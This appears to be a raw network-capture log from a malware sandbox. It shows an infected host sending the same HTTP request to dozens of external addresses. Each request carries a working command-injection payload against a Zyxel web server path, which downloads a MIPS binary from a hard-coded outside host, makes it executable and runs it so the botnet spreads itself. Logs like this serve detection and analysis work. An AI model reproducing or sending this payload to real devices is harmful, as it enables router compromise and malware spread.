                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7088192.168.2.14440102.121.180.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.230998039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7089192.168.2.1436816204.70.20.121443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.231030941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7090192.168.2.1451098180.221.173.62443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.231071949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7091192.168.2.1451408154.91.237.218443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.231121063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7092192.168.2.1436488117.59.7.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.231126070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7093192.168.2.145832491.117.90.204443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.231153965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7094192.168.2.1451438133.96.69.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.231190920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7095192.168.2.1455288112.136.216.190443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.231225967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7096192.168.2.144855474.196.175.201443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.231261969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7097192.168.2.1438074169.96.31.60443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.231323004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7098192.168.2.1441506139.144.77.118443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.231350899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7099192.168.2.143414868.106.9.185443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.231379986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7100192.168.2.1457268210.52.167.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.231400967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7101192.168.2.1437108190.227.30.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.231458902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7102192.168.2.1452402144.64.225.140443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.231503010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7103192.168.2.1444180175.135.78.161443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.231527090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7104192.168.2.1437610102.28.138.222443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.231579065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7105192.168.2.145200849.161.200.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.231614113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7106192.168.2.1449394131.22.122.133443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.231657028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7107192.168.2.1446832206.24.158.56443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.231690884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7108192.168.2.145093841.105.62.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.231729984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7109192.168.2.1438400146.243.83.100443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.231772900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7110192.168.2.1444870188.225.159.217443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.231812954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7111192.168.2.1434852156.86.150.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.231854916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7112192.168.2.1444480170.97.52.12443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.231901884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7113192.168.2.144490696.45.188.24443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.231952906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7114192.168.2.1451348205.77.42.57443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.231971025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7115192.168.2.14336709.17.103.3443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.232017040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7116192.168.2.1445788185.45.92.198443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.232038021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7117192.168.2.1441844129.144.28.20443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.232094049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7118192.168.2.1434616160.235.191.19443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.232140064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7119192.168.2.1434810157.156.249.200443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.232175112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7120192.168.2.1450336219.84.177.139443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.232213974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7121192.168.2.143916438.58.53.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.232249022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7122192.168.2.1454042103.51.185.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.232279062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7123192.168.2.1436464184.18.175.172443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.232311964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7124192.168.2.144257225.170.104.98443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.232369900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7125192.168.2.1435958142.208.205.8443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.232399940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7126192.168.2.1457872180.172.194.212443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.232431889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7127192.168.2.143594269.196.251.88443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.232469082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7128192.168.2.143759057.45.27.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.232487917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7129192.168.2.1445008101.197.64.144443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.232549906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7130192.168.2.145790685.245.138.100443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.232588053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7131192.168.2.1440654168.109.47.239443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.232629061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7132192.168.2.1449686103.97.18.142443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.232660055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7133192.168.2.1460528125.95.157.38443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.232702017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7134192.168.2.1459960220.101.114.68443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.232748985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7135192.168.2.143472848.175.54.92443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.232786894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7136192.168.2.145264464.212.123.222443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.232815981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7137192.168.2.1443558151.179.9.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.232858896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7138192.168.2.143927219.131.170.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.232917070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7139192.168.2.1447870102.130.63.46443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.232942104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7140192.168.2.145342679.32.36.167443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.232985020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7141192.168.2.145105836.233.207.172443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.233031988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7142192.168.2.1456294202.198.169.223443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.233056068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7143192.168.2.145824225.68.219.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.233095884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7144192.168.2.143282268.246.39.246443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.233134985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7145192.168.2.1448994120.202.156.51443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.233167887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7146192.168.2.1445644140.193.9.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.233211040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7147192.168.2.1455230145.180.62.250443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.233247042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7148192.168.2.1439880170.165.114.188443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.233269930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7149192.168.2.14548845.219.232.46443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.233314037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7150192.168.2.1440060176.70.179.94443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.233359098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7151192.168.2.143669447.31.39.178443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.233392000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
